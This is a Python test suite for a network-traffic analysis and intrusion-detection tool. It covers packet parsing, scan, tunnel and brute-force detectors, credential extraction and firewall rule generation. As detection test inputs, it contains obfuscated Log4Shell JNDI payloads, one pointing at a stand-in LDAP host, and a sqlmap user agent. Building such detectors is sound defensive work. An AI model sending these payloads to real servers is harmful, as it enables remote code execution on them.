"""
trafkit test suite.

Run with: python tests/test_trafkit.py    (or: python -m pytest tests/ -q)

Samples live in samples/ (generated by make_pcaps.py, run automatically by
setUpModule if the directory is missing) -- one small capture per detector
scenario, plus clean_baseline.pcapng which must trip *nothing* and
regression-tests every rule's false-positive surface at once.
"""

from __future__ import annotations

import os
import subprocess
import sys
import unittest

sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))

import trafkit
from trafkit.aclgen import generate_acl
from trafkit.detectors.cleartext import extract_credentials
from trafkit.detectors.hostid import identify_hosts_and_users
from trafkit.enrich import digit_ratio, looks_encoded, shannon_entropy
from trafkit.extract import extract_files, search_keywords
from trafkit.filters import FilterSyntaxError, apply_filter, parse_filter, evaluate
from trafkit.hosts import build_conversations, build_hosts, resolved_addresses
from trafkit.pcapread import read_pcap
from trafkit.statistics import capture_summary, dns_stats, http_stats, protocol_hierarchy

ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SAMPLES = os.path.join(ROOT, "samples", "trafkit")


def setUpModule():
    if not os.path.isdir(SAMPLES) or not os.listdir(SAMPLES):
        subprocess.run([sys.executable, os.path.join(ROOT, "tools", "make_traf_pcaps.py"), SAMPLES],
                        cwd=ROOT, check=True)


def _p(name: str) -> str:
    return os.path.join(SAMPLES, f"{name}.pcapng")


def _rule_ids(result) -> set:
    return {f.rule_id for f in result.findings}


# --------------------------------------------------------------------------
# Filter DSL
# --------------------------------------------------------------------------

class TestFilters(unittest.TestCase):
    FIELDS = {
        "ip.src": "10.0.0.5", "ip.dst": "10.0.0.9",
        "tcp.srcport": 51000, "tcp.dstport": 443,
        "tcp.flags.syn": 1, "tcp.flags.ack": 0, "tcp.window_size": 800,
        "http.server": "Apache/2.4", "http.host": "foo.php.example",
        "dns.qry.name.len": 55, "frame.number": 7,
    }

    def _t(self, expr, want):
        self.assertEqual(evaluate(parse_filter(expr), self.FIELDS), want, expr)

    def test_equality(self):
        self._t("ip.src == 10.0.0.5", True)
        self._t("ip.src == 10.0.0.9", False)
        self._t("ip.src != 10.0.0.9", True)

    def test_ip_addr_alias_matches_either_direction(self):
        self._t("ip.addr == 10.0.0.5", True)
        self._t("ip.addr == 10.0.0.9", True)
        self._t("ip.addr == 10.0.0.1", False)

    def test_cidr_membership(self):
        self._t("ip.addr == 10.0.0.0/24", True)
        self._t("ip.addr == 10.10.10.0/24", False)

    def test_numeric_operators(self):
        self._t("tcp.window_size <= 1024", True)
        self._t("tcp.window_size > 1024", False)
        self._t("tcp.flags.syn==1 and tcp.flags.ack==0", True)

    def test_hex_literal(self):
        self.FIELDS["ip.ttl"] = 250
        self._t("ip.ttl >= 0xFA", True)
        del self.FIELDS["ip.ttl"]

    def test_port_alias(self):
        self._t("tcp.port == 443", True)
        self._t("tcp.port in {80 443 8080}", True)
        self._t("tcp.port in {21 22 23}", False)

    def test_contains_and_matches(self):
        self._t('http.server contains "Apache"', True)
        self._t('http.server contains "nginx"', False)
        self._t(r'http.host matches "\.(php|html)"', True)
        self._t(r'http.host matches "\.(exe|zip)$"', False)

    def test_functions(self):
        self._t('upper(http.server) contains "APACHE"', True)
        self._t('lower(http.server) contains "apache"', True)
        self._t('string(frame.number) matches "[13579]$"', True)

    def test_presence(self):
        self._t("tcp", True)
        self._t("arp", False)
        self._t("http.server", True)
        self._t("http.request", False)

    def test_logic(self):
        self._t("not (ip.src == 10.0.0.9)", True)
        self._t("ip.src == 10.0.0.9 or tcp.port == 443", True)
        self._t("ip.src == 10.0.0.9 && tcp.port == 443", False)

    def test_keyword_operators(self):
        self._t("ip.ttl gt 250", False)  # field absent -> False, not an error

    def test_bad_syntax_raises(self):
        with self.assertRaises(FilterSyntaxError):
            parse_filter("ip.src ===")
        with self.assertRaises(FilterSyntaxError):
            parse_filter("(ip.src == 10.0.0.5")

    def test_apply_filter_over_packets(self):
        packets = read_pcap(_p("nmap_syn"))
        matched = apply_filter(
            "tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size <= 1024", packets)
        self.assertTrue(matched)
        self.assertTrue(all(p.fields.get("tcp.window_size", 9999) <= 1024 for p in matched))


# --------------------------------------------------------------------------
# Enrichment primitives
# --------------------------------------------------------------------------

class TestEnrich(unittest.TestCase):
    def test_entropy_uniform_higher_than_repeated(self):
        self.assertGreater(shannon_entropy("abcdefgh"), shannon_entropy("aaaaaaaa"))
        self.assertEqual(shannon_entropy(""), 0.0)

    def test_looks_encoded(self):
        self.assertTrue(looks_encoded("aj39skdmxnq81zpq"))
        self.assertFalse(looks_encoded("www"))
        self.assertFalse(looks_encoded("shortlabel"))

    def test_digit_ratio(self):
        self.assertEqual(digit_ratio("abc123"), 0.5)
        self.assertEqual(digit_ratio(""), 0.0)


# --------------------------------------------------------------------------
# PCAP field extraction
# --------------------------------------------------------------------------

class TestPcapread(unittest.TestCase):
    def test_arp_fields(self):
        packets = read_pcap(_p("arp_spoof"))
        arps = [p for p in packets if p.proto == "arp"]
        self.assertTrue(arps)
        first = arps[0]
        self.assertIn("arp.opcode", first.fields)
        self.assertIn("arp.src.proto_ipv4", first.fields)

    def test_tcp_flag_decomposition(self):
        packets = read_pcap(_p("nmap_connect"))
        syn = next(p for p in packets if p.fields.get("tcp.flags.syn") == 1
                   and p.fields.get("tcp.flags.ack") == 0)
        self.assertEqual(syn.fields["tcp.flags.fin"], 0)
        self.assertEqual(syn.fields["tcp.flags.reset"], 0)

    def test_icmp_unreachable_encapsulation(self):
        packets = read_pcap(_p("nmap_udp"))
        unreachable = next(p for p in packets if p.fields.get("icmp.type") == 3)
        self.assertIn("icmp.orig.udp.dstport", unreachable.fields)

    def test_dns_fields(self):
        packets = read_pcap(_p("dns_tunnel"))
        q = next(p for p in packets if "dns.qry.name" in p.fields)
        self.assertGreaterEqual(q.fields["dns.qry.name.len"], 40)

    def test_dhcp_hostname_and_nbns(self):
        packets = read_pcap(_p("dhcp_nbns_kerberos"))
        self.assertTrue(any(p.fields.get("dhcp.option.hostname") == "WIN-016" for p in packets))
        self.assertTrue(any(p.fields.get("nbns.name") == "WIN-016" for p in packets))

    def test_kerberos_fallback_extraction(self):
        packets = read_pcap(_p("dhcp_nbns_kerberos"))
        krb = [p for p in packets if p.fields.get("kerberos")]
        self.assertTrue(krb)
        f = krb[0].fields
        self.assertEqual(f.get("kerberos.realm"), "CORP.LOCAL")
        self.assertIn("jdoe", f.get("kerberos.CNameString", ""))

    def test_http_request_and_response(self):
        packets = read_pcap(_p("http_traffic"))
        req = next(p for p in packets if p.fields.get("http.request"))
        self.assertEqual(req.fields["http.request.method"], "GET")
        resp = next(p for p in packets if p.fields.get("http.response"))
        self.assertIn("http.response.code", resp.fields)

    def test_ftp_request_and_response(self):
        packets = read_pcap(_p("ftp_bruteforce"))
        self.assertTrue(any(p.fields.get("ftp.request.command") == "USER" for p in packets))
        self.assertTrue(any(p.fields.get("ftp.response.code") == 530 for p in packets))

    def test_tls_sni_and_unusual_port(self):
        packets = read_pcap(_p("tls_handshake"))
        std = next(p for p in packets if p.dst_port == 443)
        self.assertEqual(std.fields.get("tls.handshake.extensions_server_name"), "www.example.com")
        odd = next(p for p in packets if p.dst_port == 8081)
        self.assertEqual(odd.fields.get("tls.handshake.type"), 1)

    def test_malformed_frame_does_not_crash_the_read(self):
        # read_pcap must never raise on a single bad frame -- isolation, not
        # a hard failure, matches the detector-isolation contract.
        packets = read_pcap(_p("clean_baseline"))
        self.assertTrue(len(packets) > 0)


# --------------------------------------------------------------------------
# Hosts / statistics
# --------------------------------------------------------------------------

class TestHostsAndStatistics(unittest.TestCase):
    def test_host_inventory_and_os_guess(self):
        packets = read_pcap(_p("nmap_connect"))
        hosts = build_hosts(packets)
        self.assertIn("192.168.1.50", hosts)
        self.assertIsNotNone(hosts["192.168.1.50"].os_guess)

    def test_open_port_inference(self):
        packets = read_pcap(_p("nmap_connect"))
        hosts = build_hosts(packets)
        self.assertIn(22, hosts["192.168.1.10"].open_ports)

    def test_dhcp_hostname_attributed_to_assigned_ip_not_zero_addr(self):
        packets = read_pcap(_p("dhcp_nbns_kerberos"))
        hosts = build_hosts(packets)
        self.assertIn("WIN-016", hosts["192.168.1.16"].hostnames)

    def test_conversations_merge_both_directions(self):
        packets = read_pcap(_p("ftp_bruteforce"))
        convos = build_conversations(packets)
        # every conversation packet count should be >= 2 (request + response)
        self.assertTrue(all(c.packets >= 1 for c in convos))
        self.assertTrue(sum(c.packets for c in convos) <= len(packets))

    def test_resolved_addresses(self):
        packets = read_pcap(_p("clean_baseline"))
        resolved = resolved_addresses(packets)
        self.assertIn("93.184.216.34", resolved)
        self.assertIn("www.example.com", resolved["93.184.216.34"])

    def test_protocol_hierarchy_and_capture_summary(self):
        packets = read_pcap(_p("http_traffic"))
        hier = protocol_hierarchy(packets)
        self.assertIn("tcp.http", hier)
        summary = capture_summary(packets)
        self.assertEqual(summary["packet_count"], len(packets))

    def test_dns_stats(self):
        packets = read_pcap(_p("dns_tunnel"))
        stats = dns_stats(packets)
        self.assertGreaterEqual(stats.total_queries, 20)

    def test_http_stats(self):
        packets = read_pcap(_p("http_traffic"))
        stats = http_stats(packets)
        self.assertGreaterEqual(stats.total_requests, 5)
        self.assertIn("GET", stats.methods)


# --------------------------------------------------------------------------
# Detectors -- one positive case per rule, plus the shared clean-baseline
# negative case for all of them at once.
# --------------------------------------------------------------------------

class TestDetectors(unittest.TestCase):
    def test_clean_baseline_triggers_nothing(self):
        result = trafkit.analyze(_p("clean_baseline"))
        self.assertEqual(result.findings, [])

    def test_tcp_connect_scan(self):
        result = trafkit.analyze(_p("nmap_connect"))
        self.assertIn("SCAN-NMAP-01", _rule_ids(result))
        f = next(f for f in result.findings if f.rule_id == "SCAN-NMAP-01")
        self.assertIn("Connect", f.evidence["scan_type"])

    def test_tcp_syn_scan(self):
        result = trafkit.analyze(_p("nmap_syn"))
        self.assertIn("SCAN-NMAP-01", _rule_ids(result))
        f = next(f for f in result.findings if f.rule_id == "SCAN-NMAP-01")
        self.assertIn("SYN", f.evidence["scan_type"])

    def test_udp_scan(self):
        result = trafkit.analyze(_p("nmap_udp"))
        self.assertIn("SCAN-NMAP-03", _rule_ids(result))

    def test_horizontal_scan(self):
        result = trafkit.analyze(_p("horizontal_scan"))
        self.assertIn("SCAN-NMAP-02", _rule_ids(result))

    def test_arp_spoof_and_relay(self):
        result = trafkit.analyze(_p("arp_spoof"))
        ids = _rule_ids(result)
        self.assertIn("ARP-SPOOF-01", ids)
        self.assertIn("ARP-SPOOF-02", ids)

    def test_arp_flood(self):
        result = trafkit.analyze(_p("arp_flood"))
        self.assertIn("ARP-FLOOD-01", _rule_ids(result))

    def test_dhcp_starvation(self):
        result = trafkit.analyze(_p("dhcp_nbns_kerberos"))
        self.assertIn("DHCP-ANOM-01", _rule_ids(result))

    def test_icmp_tunnel(self):
        result = trafkit.analyze(_p("icmp_tunnel"))
        self.assertIn("TUNNEL-ICMP-01", _rule_ids(result))
        # exactly one finding for the bidirectional pair, not two mirror ones
        icmp_findings = [f for f in result.findings if f.rule_id == "TUNNEL-ICMP-01"]
        self.assertEqual(len(icmp_findings), 1)

    def test_dns_tunnel(self):
        result = trafkit.analyze(_p("dns_tunnel"))
        self.assertIn("TUNNEL-DNS-01", _rule_ids(result))

    def test_ftp_bruteforce_and_spray(self):
        result = trafkit.analyze(_p("ftp_bruteforce"))
        ids = _rule_ids(result)
        self.assertIn("FTP-BRUTE-01", ids)
        self.assertIn("FTP-BRUTE-02", ids)
        # the single successful login must not itself appear as a failure
        brute = next(f for f in result.findings if f.rule_id == "FTP-BRUTE-01")
        self.assertNotIn("192.168.1.80", brute.evidence.values())

    def test_http_scanner_ua_and_log4j(self):
        result = trafkit.analyze(_p("http_traffic"))
        ids = _rule_ids(result)
        self.assertIn("HTTP-UA-01", ids)
        self.assertIn("HTTP-LOG4J-01", ids)
        log4j = next(f for f in result.findings if f.rule_id == "HTTP-LOG4J-01")
        self.assertEqual(log4j.severity, "critical")

    def test_tls_unusual_port(self):
        result = trafkit.analyze(_p("tls_handshake"))
        self.assertIn("TLS-PORT-01", _rule_ids(result))
        f = next(f for f in result.findings if f.rule_id == "TLS-PORT-01")
        self.assertEqual(f.evidence["port"], 8081)

    def test_detector_isolation_survives_a_bad_packet_list(self):
        # A detector that raises must not take the whole run down -- confirm
        # by handing analyze() an empty packet list (edge case every
        # detector's aggregation loop must handle without raising).
        from trafkit.config import Config
        from trafkit.detectors import AnalysisContext, run_detectors
        findings = run_detectors([], AnalysisContext(hosts={}, conversations=[]), Config())
        self.assertEqual(findings, [])


# --------------------------------------------------------------------------
# Extraction: credentials, files, keywords, host/user identification
# --------------------------------------------------------------------------

class TestExtraction(unittest.TestCase):
    def test_ftp_credentials(self):
        packets = read_pcap(_p("ftp_bruteforce"))
        creds = extract_credentials(packets)
        self.assertTrue(any(c.protocol == "ftp" and c.username == "svc_backup"
                             and c.secret == "correcthorse" for c in creds))

    def test_http_basic_and_form_credentials(self):
        packets = read_pcap(_p("http_traffic"))
        creds = extract_credentials(packets)
        kinds = {c.protocol for c in creds}
        self.assertIn("http-basic", kinds)
        self.assertIn("http-form", kinds)
        form_cred = next(c for c in creds if c.protocol == "http-form")
        self.assertEqual(form_cred.username, "jsmith")
        self.assertEqual(form_cred.secret, "hunter2")

    def test_extract_files_metadata(self):
        packets = read_pcap(_p("http_traffic"))
        files = extract_files(packets)
        self.assertTrue(any(a.detail["filename"] == "suspicious_package.zip" for a in files))

    def test_search_keywords(self):
        packets = read_pcap(_p("http_traffic"))
        hits = search_keywords(packets, ["sqlmap", "nonexistent-keyword-xyz"])
        self.assertTrue(any(h.detail["keyword"] == "sqlmap" for h in hits))
        self.assertFalse(any(h.detail["keyword"] == "nonexistent-keyword-xyz" for h in hits))

    def test_identify_hosts_and_users(self):
        packets = read_pcap(_p("dhcp_nbns_kerberos"))
        ids = identify_hosts_and_users(packets)
        self.assertIn("jdoe", ids["kerberos_users"])
        self.assertIn("WIN-016", ids["kerberos_hosts"])


# --------------------------------------------------------------------------
# ACL generation
# --------------------------------------------------------------------------

class TestAclGen(unittest.TestCase):
    def test_iptables_rules_from_scan_finding(self):
        result = trafkit.analyze(_p("nmap_connect"))
        out = generate_acl(result.findings, "iptables", min_severity="medium")
        self.assertIn("192.168.1.50", out)
        self.assertIn("iptables -A INPUT -s 192.168.1.50 -j DROP", out)

    def test_never_blocks_the_victim(self):
        result = trafkit.analyze(_p("nmap_connect"))
        out = generate_acl(result.findings, "iptables", min_severity="medium")
        self.assertNotIn("192.168.1.10", out)  # the scanned host, not the scanner

    def test_all_targets_produce_output(self):
        result = trafkit.analyze(_p("ftp_bruteforce"))
        for target in ("iptables", "cisco_ios", "pf", "netsh"):
            out = generate_acl(result.findings, target, min_severity="medium")
            self.assertTrue(out.strip())

    def test_no_findings_above_threshold_is_explicit(self):
        out = generate_acl([], "iptables", min_severity="high")
        self.assertIn("No iptables rules generated", out)

    def test_cisco_acl_does_not_end_in_implicit_deny(self):
        from trafkit.models import Finding
        f = Finding(rule_id="X", title="x", severity="high", confidence="high", description="",
                    evidence={"src": "198.51.100.7"})
        out = generate_acl([f], "cisco_ios")
        self.assertIn("deny ip host 198.51.100.7 any", out)
        self.assertIn("permit ip any any", out)       # otherwise the interface drops everything

    def test_ipv6_attackers_get_ip6tables_rules(self):
        from trafkit.models import Finding
        f = Finding(rule_id="X", title="x", severity="high", confidence="high", description="",
                    evidence={"src": "2001:db8::66"})
        self.assertIn("ip6tables -A INPUT -s 2001:db8::66 -j DROP", generate_acl([f], "iptables"))


# --------------------------------------------------------------------------
# Behaviour added in the workbench refactor
# --------------------------------------------------------------------------

def _pkt(n, fields, src="10.0.0.5", dst="10.0.0.9", ts=None):
    from trafkit.models import PacketRecord
    return PacketRecord(frame_number=n, ts=ts if ts is not None else 1000.0 + n, length=100,
                        fields=dict(fields), src_ip=src, dst_ip=dst, proto="tcp",
                        src_port=40000, dst_port=80)


class TestRefactorBehaviour(unittest.TestCase):
    def test_scanner_user_agent_is_one_finding_per_source(self):
        from trafkit.config import Config
        from trafkit.detectors.http import ScannerUserAgentDetector
        pkts = [_pkt(i, {"http.request": True, "http.user_agent": "sqlmap/1.7",
                         "http.request.uri": f"/item?id={i}"}) for i in range(500)]
        findings = ScannerUserAgentDetector(Config()).run(pkts, None)
        self.assertEqual(len(findings), 1)
        self.assertEqual(findings[0].evidence["requests"], 500)
        self.assertEqual(len(findings[0].frames), 25)

    def test_obfuscated_log4shell_is_caught(self):
        from trafkit.config import Config
        from trafkit.detectors.http import Log4jJndiDetector, deobfuscate_jndi
        self.assertEqual(deobfuscate_jndi("${${lower:j}ndi:ldap://x/a}"), "${jndi:ldap://x/a}")
        self.assertEqual(deobfuscate_jndi("${${::-j}${::-n}${::-d}${::-i}:rmi://x/a}"),
                         "${jndi:rmi://x/a}")
        pkts = [_pkt(1, {"http.request": True,
                         "http.user_agent": "${${env:NaN:-j}ndi${env:NaN:-:}ldap://203.0.113.9/x}"})]
        findings = Log4jJndiDetector(Config()).run(pkts, None)
        self.assertEqual(len(findings), 1)
        self.assertIn("deobfuscated", findings[0].evidence)

    def test_nbns_query_is_not_the_queriers_name(self):
        query = _pkt(1, {"nbns.name": "WPAD", "nbns.opcode": 0, "nbns.flags.response": 0},
                     src="192.168.1.30", dst="192.168.1.255")
        reg = _pkt(2, {"nbns.name": "LAPTOP-7", "nbns.opcode": 5, "nbns.flags.response": 0,
                       "nbns.addr": "192.168.1.31"}, src="192.168.1.31", dst="192.168.1.255")
        hosts = build_hosts([query, reg])
        self.assertNotIn("WPAD", hosts["192.168.1.30"].hostnames)
        self.assertIn("LAPTOP-7", hosts["192.168.1.31"].hostnames)
        ids = identify_hosts_and_users([query, reg])
        self.assertEqual(ids["nbns_hostnames"], {"192.168.1.31": ["LAPTOP-7"]})

    def test_identify_files_dhcp_hostname_under_assigned_ip(self):
        ids = identify_hosts_and_users(read_pcap(_p("dhcp_nbns_kerberos")))
        self.assertIn("WIN-016", ids["dhcp_hostnames"].get("192.168.1.16", []))
        self.assertNotIn("0.0.0.0", ids["dhcp_hostnames"])

    def test_resolved_addresses_follow_cname_chains(self):
        p = _pkt(1, {"dns.qry.name": "www.example.org", "dns.qry.type": 1, "dns.flags.response": 1,
                     "dns.answer": "edge.example.net", "dns.a": "192.0.2.10",
                     "dns.a_all": ["192.0.2.10", "192.0.2.11"]})
        resolved = resolved_addresses([p])
        self.assertEqual(resolved, {"192.0.2.10": {"www.example.org"},
                                    "192.0.2.11": {"www.example.org"}})

    def test_scapy_backend_is_opt_in_not_required(self):
        from trafkit.pcapread import read_pcap as rp
        self.assertEqual(len(rp(_p("tls_handshake"))), 2)            # native default
        with self.assertRaises(ValueError):
            rp(_p("tls_handshake"), backend="bogus")


if __name__ == "__main__":
    unittest.main(verbosity=2)
